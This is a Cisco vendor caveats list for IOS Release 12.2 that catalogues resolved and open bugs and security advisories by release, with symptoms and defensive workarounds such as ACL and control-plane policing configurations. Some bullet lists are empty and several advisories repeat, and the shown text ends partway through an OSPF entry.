Table Of Contents
Caveats for Cisco IOS Release 12.2
Resolved Caveats—Cisco IOS Release 12.2(46a)
Open Caveats—Cisco IOS Release 12.2(46)
Resolved Caveats—Cisco IOS Release 12.2(46)
Resolved Caveats—Cisco IOS Release 12.2(40a)
Resolved Caveats—Cisco IOS Release 12.2(40)
Resolved Caveats—Cisco IOS Release 12.2(37)
Resolved Caveats—Cisco IOS Release 12.2(34a)
Resolved Caveats—Cisco IOS Release 12.2(34)
Resolved Caveats—Cisco IOS Release 12.2(32)
Resolved Caveats—Cisco IOS Release 12.2(31)
Resolved Caveats—Cisco IOS Release 12.2(29b)
Resolved Caveats—Cisco IOS Release 12.2(29a)
Resolved Caveats—Cisco IOS Release 12.2(29)
Resolved Caveats—Cisco IOS Release 12.2(28d)
Resolved Caveats—Cisco IOS Release 12.2(28c)
Resolved Caveats—Cisco IOS Release 12.2(28b)
Resolved Caveats—Cisco IOS Release 12.2(28a)
Resolved Caveats—Cisco IOS Release 12.2(28)
Resolved Caveats—Cisco IOS Release 12.2(27c)
Resolved Caveats—Cisco IOS Release 12.2(27b)
Resolved Caveats—Cisco IOS Release 12.2(27a)
Resolved Caveats—Cisco IOS Release 12.2(27)
Resolved Caveats—Cisco IOS Release 12.2(26c)
Resolved Caveats—Cisco IOS Release 12.2(26b)
Resolved Caveats—Cisco IOS Release 12.2(26a)
Resolved Caveats—Cisco IOS Release 12.2(26)
Resolved Caveats—Cisco IOS Release 12.2(24b)
Resolved Caveats—Cisco IOS Release 12.2(24a)
Resolved Caveats—Cisco IOS Release 12.2(24)
Resolved Caveats—Cisco IOS Release 12.2(23f)
Resolved Caveats—Cisco IOS Release 12.2(23e)
Resolved Caveats—Cisco IOS Release 12.2(23d)
Resolved Caveats—Cisco IOS Release 12.2(23c)
Resolved Caveats—Cisco IOS Release 12.2(23a)
Resolved Caveats—Cisco IOS Release 12.2(23)
Resolved Caveats—Cisco IOS Release 12.2(21b)
Resolved Caveats—Cisco IOS Release 12.2(21a)
Resolved Caveats—Cisco IOS Release 12.2(21)
Resolved Caveats—Cisco IOS Release 12.2(19c)
Resolved Caveats—Cisco IOS Release 12.2(19b)
Resolved Caveats—Cisco IOS Release 12.2(19a)
Resolved Caveats—Cisco IOS Release 12.2(19)
Resolved Caveats—Cisco IOS Release 12.2(17f)
Resolved Caveats—Cisco IOS Release 12.2(17e)
Resolved Caveats—Cisco IOS Release 12.2(17d)
Resolved Caveats—Cisco IOS Release 12.2(17b)
Resolved Caveats—Cisco IOS Release 12.2(17a)
Resolved Caveats—Cisco IOS Release 12.2(17)
Novell IPX, XNS, and Apollo Domain
Resolved Caveats—Cisco IOS Release 12.2(16f)
Resolved Caveats—Cisco IOS Release 12.2(16c)
Resolved Caveats—Cisco IOS Release 12.2(16b)
Resolved Caveats—Cisco IOS Release 12.2(16a)
Novell IPX, XNS, and Apollo Domain
Resolved Caveats—Cisco IOS Release 12.2(16)
Caveats for Cisco IOS Release 12.2
September 24, 2008
Cisco IOS Release 12.2(46a)
OL-3513-16 Rev. G0
This document lists severity 1 and 2 caveats and select severity 3 caveats for Cisco IOS Release 12.2, up to and including Cisco IOS Release 12.2(46a). Caveats describe unexpected behavior or defects in Cisco IOS software releases. Severity 1 caveats are the most serious caveats; severity 2 caveats are less serious.
To improve this document, we would appreciate your comments. If you are reading Cisco product documentation on the World Wide Web, you can submit comments electronically at http://www.cisco.com/feedback/ or contact caveats-doc@cisco.com. For more information, see the "Obtaining Documentation and Submitting a Service Request" section on page 893.
Contents
•
Resolved Caveats—Cisco IOS Release 12.2(46a)
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
How to Use This Document
This document describes open and resolved severity 1 and 2 caveats and select severity 3 caveats:
•
•
Within the sections the caveats are sorted by technology in alphabetical order. For example, AppleTalk caveats are listed separately from, and before, IP caveats. The caveats are also sorted alphanumerically by caveat number.
If You Need More Information
Cisco IOS software documentation can be found on the web through Cisco.com. For information on Cisco.com, see the "Obtaining Documentation and Submitting a Service Request" section on page 893.
For more information on caveats and features in Cisco IOS Release 12.2, refer to the following sources:
•
•
•
•
•
•
The most recent release notes when this caveats document was published were Release Notes for Cisco IOS Release 12.2, for Cisco IOS Release 12.2(46) on April 27, 2007.
Resolved Caveats—Cisco IOS Release 12.2(46a)
Cisco IOS Release 12.2(46a) is a rebuild release for Cisco IOS Release 12.2(46). The caveats in this section are resolved in Cisco IOS Release 12.2(46a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Miscellaneous
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Symptoms: A Cisco IOS device may produce the following error when reading or writing the configuration:
%DATACORRUPTION-1-DATAINCONSISTENCY: write of 11 bytes to 10 bytesConditions: This symptom has been observed when reading or writing the configuration.
Workaround: There is no workaround.
•
Symptoms: A router that has the SNASwitch feature enabled may generate several of the following messages along with tracebacks:
%DATACORRUPTION-1-DATAINCONSISTENCY: copy of xx bytes should be xx bytesConditions: This symptom is observed on a Cisco router that runs a Cisco IOS software image that contains the fix for caveat CSCsh87705. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCsh87705. Cisco IOS software releases that are not listed in the "First Fixed- in Version" field at this location are not affected.
Workaround: There is no workaround.
Further Problem Description: The messages do not affect the normal operation of the router in any way. The SNASwitch continues to function normally.
•
Symptoms: Following an upgrade to Cisco IOS Release 12.2(18)SXF9, the following message may be displayed:
%DATACORRUPTION-1-DATAINCONSISTENCY: copy error -Traceback=Conditions: This message may appear as a result of SNMP polling of PAgP variables, but does not appear to be service impacting.
Workaround: There is no workaround.
TCP/IP Host-Mode Services
•
Symptoms: Identification field is always 0 in the tacacs+ packet with SYN flag. The TACACS packet goes from a Catalyst 6509 through an FW to the AAA server. The FW construes this as a Fragment Overlap Attack and drops additional new connections.
Conditions: This symptom has been observed on a Catalyst 6509 connecting through an FW to an AAA server.
Workaround: There is no workaround.
Open Caveats—Cisco IOS Release 12.2(46)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(46). All the caveats listed in this section are open in Cisco IOS Release 12.2(46). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: An SNMP Manager that uses SNMPv3 may not resynchronize the timer for the SNMP engine after the router has been reloaded.
Conditions: This symptom is observed on Cisco Catalyst 6000 series switch and Cisco 7600 series router that have been reloaded and occurs because a parameter is incorrectly set in the REPORT message, causing a mediation device to register an SNMP timeout instead of a reload.
Workaround: You may be able to restart the SNMP Manager to force the timer for the SNMP engine to resynchronize. Note, however, that doing so causes a 100-percent outage for all wiretaps that are served by the SNMP Manager. If you cannot restart the SNMP Manager, there is no workaround.
IP Routing Protocols
•
Symptoms: Rate limiting feature with MQC does not work on a multilink interface on an RSP router that is configured with MDS with the policy applied as an output policy. Because of this, traffic is not rate limited, and all traffic passes through.
Conditions: This symptom is observed on an RSP router that is running Cisco IOS Interim Release 12.4(11.6a).
Workaround: There is no workaround.
Miscellaneous
•
Symptoms: Adding a /31 netmask route on a Cisco router may not overwrite an existing /32 CEF entry.
Conditions: This symptom is observed on a Cisco router that runs Cisco IOS Release 12.1(13)E4, Release 12.2 other 12.1 E releases, or Release 12.3.
Workaround: There is no workaround.
Further Problem Description: The fix for this caveat enables prefixes that are derived from adjacencies in the FIB to be periodically validated against covering prefixes that originate from the RIB. Validation ensures that an adjacency prefix is only active when it points out of the same interface as a covering attached prefix. To enable this validation, enter the ip cef table adjacency-prefix validate global configuration command.
Note that because validation is periodic, there could be a time lag between RIB changes and subsequent validation or withdrawal of covered adjacencies in the FIB.
•
Symptoms: The bandwidth of an IMA group interface may be less than the combined bandwidth of its active member links that are up and operational.
Conditions: This symptom is observed on an IMA group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter that is installed in a Cisco 7xxx platform when the IMA group interface has more than one member link. The symptom occurs when you enter the shutdown interface configuration command quickly followed by the no shutdown interface configuration command on a member link (that is, the command sequence takes less than two seconds). When the member link comes up, the bandwidth of the IMA group interface is not increased.
Workaround: There is no workaround.
•
Symptoms: After an SSO switchover has occurred, the second of two 6000 W DC power supplies in the chassis is shut down.
Conditions: This symptom is observed on a Cisco Catalyst 6000 series switch and Cisco 7600 router when both power supplies are powered on before the SSO switchover occurs.
Workaround: There is no workaround.
•
Symptoms: Some E1 channels may remain down after you have reloaded a router.
Conditions: This symptom is observed on a Cisco 7200 series that function as a PE router and that connects to a CE router. Both routers are connected through 1-port multichannel STM-1 (PA-MC-STM-1) port adapters and the framing no-crc4 command is enabled on all interfaces of both routers.
Workaround: Enter the shutdown command followed by the no shutdown command on the SONET controller of the PA-MC-STM-1 at the PE side to enable all interfaces to come up.
•
Symptoms: A VIP4-80 that is running Cisco IOS Release 12.2(40) crashes due to a software bus error.
Conditions: This symptom is observed when a VIP4-80 crashes while all interfaces are coming up.
Workaround: There is no workaround.
Resolved Caveats—Cisco IOS Release 12.2(46)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(46). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(46). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml
IP Routing Protocols
•
The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.
NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.
NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.
NHRP is not enabled by default for Cisco IOS.
This vulnerability is addressed by Cisco bug IDs CSCin95836 (registered customers only) for non-12.2 mainline releases and CSCsi23231 (registered customers only) for 12.2 mainline releases.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.
Miscellaneous
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Symptoms: Voice calls with ground-start signaling fail at the terminating gateway (TGW) with confirmed errors at the originating side.
Conditions: This symptom is observed when the dial peers are matched, when VTSP initiates dialing the remote destination, when the DSP fails to wait for the offhook signal transition from the remote endpoint, and when the DSPRM closes the DSP voice channel.
Workaround: Enter the shutdown command followed by the no shutdown command on the affected voice port on the TGW. Note that the symptom does not occur with loop-start signaling.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The Cisco IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the Cisco IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the Cisco IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
Resolved Caveats—Cisco IOS Release 12.2(40a)
Cisco IOS Release 12.2(40a) is a rebuild release for Cisco IOS Release 12.2(40). The caveats in this section are resolved in Cisco IOS Release 12.2(40a) but may be open in previous Cisco IOS releases.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: Tracebacks or crash are seen during HTTP transactions with long URLs.
Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.
Workaround: Disable HTTP server using the no ip http server command.
•
Symptoms: A tftp client trying to transfer a file from a Cisco IOS device configured as a tftp server and which is denied by an ACL receives a different result depending if the file is being offered for download or not. This may allow a third party to enumerate which files are available for download.
Conditions: The tftp-server command is configured on the device and an ACL restricting access to the file in question has been applied as in this example:
tftp-server flash:filename1 access-list-numberaccess-list access-list- numberpermit 192.168.1.0 0.0.0.255access-list access-list- numberdeny anyWorkaround: The following workarounds can be applied:
1. Interface ACL Configure and attach an access list to every router interface active and configured for IP packet processing. Example:
access-list access-list- numberremark --- the following hosts and networks area ALLOWED for TFTP accessaccess-list access-list- numberpermit udp host source_1host interface_address_1eq 69access-list access-list- numberpermit udp host source_2host interface_address_2eq 69access-list access-list- numberpermit udp source source- wildcardhost interface_address_1eq 69access-list access-list- numberpermit udp source source- wildcardhost interface_address_2eq 69access-list access-list- numberremark --- everyone else is DENIED for TFTP accessaccess-list access-list- numberdeny udp any host interface_address_1eq 69access-list access-list- numberdeny udp any host interface_address_2eq 69access-list access-list- numberremark --- any other traffic to/through the router is allowedaccess-list access-list- numberpermit ip any anyinterface Ethernet0/0ip access-group access-list- number inOnce the tftp server in Cisco IOS is enabled and listening by default on all interfaces enabled for IP processing, the access list would need to deny traffic to each and every IP address assigned to any active router interface.
2. Control Plane Policing Configure and apply a CoPP policy. For example:
access-list access-list- numberremark --- Do not police TFTP traffic from trusted hosts and networksaccess-list access-list- numberdeny udp host source_1 any eq 69access-list access-list- numberdeny udp source source- wildcard any eq 69access-list access-list- numberremark --- Police TFTP traffic from untrusted hosts and networksaccess-list access-list- numberpermit udp any any eq 69access-list access-list- numberremark --- Do not police any other traffic going to the routeraccess-list access-list- numberdeny ip any anyclass-map match-all tftp- classmatch access-group access-list- numberpolicy-map control-plane- policy! Drop all traffic that matches the class tftp- classclass tftp- classdropcontrol-plane service-policy input control- plane- policyNote: CoPP is only available on certain platforms and Cisco IOS releases. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/products/sw/iosswrel/ps1838/products_white_paper0918 6a0080211f39.shtml
3. Infrastructure ACLs (iACL) Although often difficult to block traffic transitting your network, identifying traffic which should never be allowed to target your infrastructure devices and block that traffic at the border of your network is possible. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The white paper entitled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for iACLs: http://www.cisco.com/warp/public/707/iacl.html
4. Configuring Receive Access Lists (rACLs) For distributed platforms, rACLs may be an option starting in Cisco IOS Release 12.0(21)S2 for the Cisco 12000 series GSR and Cisco IOS Release 12.0 (24)S for the Cisco 7500 series. The receive access lists protect the device from harmful traffic before the traffic can impact the route processor. Receive path ACLs are considered a network security best practice, and should be considered as a long-term addition to good network security, as well as a workaround for this specific vulnerability. The CPU load is distributed to the line card processors and helps mitigate load on the main route processor. The white paper entitled "GSR: Receive Access Control Lists" will help identify and allow legitimate traffic to your device and deny all unwanted packets: http://www.cisco.com/warp/public/707/racl.html
NOTE: The suggested workarounds are an "all or nothing" solution. While the tftp-server feature in Cisco IOS allows per-file ACLs to be attached to every file being offered for download, the suggested workarounds are global and will either prevent or allow access to all files being shared. It is recommended to apply the suggested workarounds in addition to the existing per-file ACLs, instead of replacing them.
•
Symptoms: Starting in calendar year 2007, daylight savings summer-time rules may cause Cisco IOS to generate timestamps (such as in syslog messages) that are off by one hour.
Conditions: The Cisco IOS configuration command:
clock summer-time zone recurring
uses United States standards for daylight savings time rules by default. The Energy Policy Act of 2005 (H.R.6.ENR), Section 110 changes the start date from the first Sunday of April to the second Sunday of March. It changes the end date from the last Sunday of October to the first Sunday of November.
Workaround: A workaround is possible by using the clock summer- time configuration command to manually configure the proper start date and end date for daylight savings time. After the summer-time period for calendar year 2006 is over, one can for example configure:
clock summer-time PDT recurring 2 Sun Mar 2:00 1 Sun Nov 2:00
(This example is for the US/Pacific time zone.)
Not A Workaround: Using NTP is not a workaround to this problem. NTP does not carry any information about timezones or summertime.
IBM Connectivity
•
A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.
There are workarounds available for this vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtmlMiscellaneous
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.
Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker will not be able to decrypt any previously encrypted information.
Cisco IOS is affected by the following vulnerabilities:
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.
Note
A combined software table for Cisco IOS is available to aid customers in choosing a software releases that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.
•
Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.
The Cisco IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the Cisco IOS FTP Server service are unaffected by these vulnerabilities.
This vulnerability does not apply to the Cisco IOS FTP Client feature.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.
TCP/IP Host-Mode Services
•
Symptoms: A router that is running RCP can be reloaded by a specific packet.
Conditions: This symptom is seen under the following conditions:
–
–
–
Workaround: Put access lists on the edge of your network blocking RCP packets to prevent spoofed RSH packets. Use another protocol such as SCP. Use VTY ACLs.
Resolved Caveats—Cisco IOS Release 12.2(40)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(40). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(40). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Specifically crafted CDP packets can cause a router to allocate and keep extra memory. Exploitation of this behavior by sending multiple specifically crafted CDP packets could cause memory allocation problems on the router.
Since CDP is a layer-2 protocol, this issue can only be triggered by systems that are residing on the same network segment.
Workaround: Disable on interfaces where CDP is not necessary.
Miscellaneous
•
Symptoms: The active router in an HSRP configuration may not respond to an ARP request for the virtual IP address. When the symptom occurs, both routers in the HSRP configuration have correct HSRP and ARP entries. Entering the clear arp command on the standby router in the HSRP configuration does not resolve the problem.
Conditions: This symptom is observed when the same HSRP virtual IP address exists in different HSRP groups on different routers.
Workaround: Enter the no standby redirects command to prevent the symptom from occurring.
•
Multiple voice-related vulnerabilities are identified in Cisco IOS software, one of which is also shared with Cisco Unified Communications Manager. These vulnerabilities pertain to the following protocols or features:
–
–
–
–
–
Cisco has made free software available to address these vulnerabilities for affected customers. Fixed Cisco IOS software listed in the Software Versions and Fixes section contains fixes for all vulnerabilities mentioned in this advisory.
There are no workarounds available to mitigate the effects of any of the vulnerabilities apart from disabling the protocol or feature itself.
This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070808-IOS-voice.shtml
•
Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.
The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.
This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml
•
Symptoms: A router may crash when a serial interface of a neighboring router is brought up.
Conditions: This symptom is observed on a Cisco router that runs a Cisco IOS software image that is earlier than Release 12.4(8) and that is configured for IP Multicast when some interfaces on the router are configured for PIM. The symptom occurs when the serial interface that is brought up on the neighboring router is configured for PIM and the connecting interface on the Cisco router is not configured for PIM.
Workaround: Depending on the desired operation for the link, either enable PIM at both ends or disable PIM at both ends.
Resolved Caveats—Cisco IOS Release 12.2(37)
This section describes possibly unexpected behavior by Cisco IOS Release 12.2(37). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(37). This section describes severity 1 and 2 caveats and select severity 3 caveats.
The following information is provided for each caveat:
•
•
•
Basic System Services
•
Symptoms: A CBUS complex may occur, causing all VIPs to reload and to be reconfigured. In turn, this situation prevents the router from being accessible for 30 seconds.
Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.0S when you change the MTU of an already existing interface or when you add a new interface. The symptom may also occur in other releases.
Workaround: There is no workaround.
•
Symptoms: Intensive SNMP polling may cause the I/O memory of a router to be depleted.
Conditions: This symptom is observed in rare situations.
Workaround: Reduce the SNMP polling interval, frequency, or rate.
•
Symptoms: A reload of a Cisco 7600 router, with a huge number (for example, 1000) of VRF configured with BGP/VPN learning redistributed routers, may cause some VRFs to not learn distributed routes from the peer.
Conditions: This symptom has been observed in Cisco IOS Release 12.2SRA when a huge number of VRF are configured. This symptom is not applicable to Cisco IOS Release 12.4.
Workaround: The symptom can be resolved on the per VRF basis by removing the VRF instance and the BGP/VPN configuration for this instance and then adding them back.
IP Routing Protocols
•
Symptoms: ABRs may continue to generate summary LSA(s) for obsolete non-backbone intra-area route(s).
Conditions: This symptom occurs under the following conditions:
1.
2.
3.
For example, 10.10.10.128/25 and 10.10.10.0/24 yield identical
LSA IDs when the network address is logically ORed with the
host bits; i.e.,
10.10.10.128 | 0.0.0.127 = 10.10.10.255
10.10.10.0 | 0.0.0.255 = 10.10.10.255
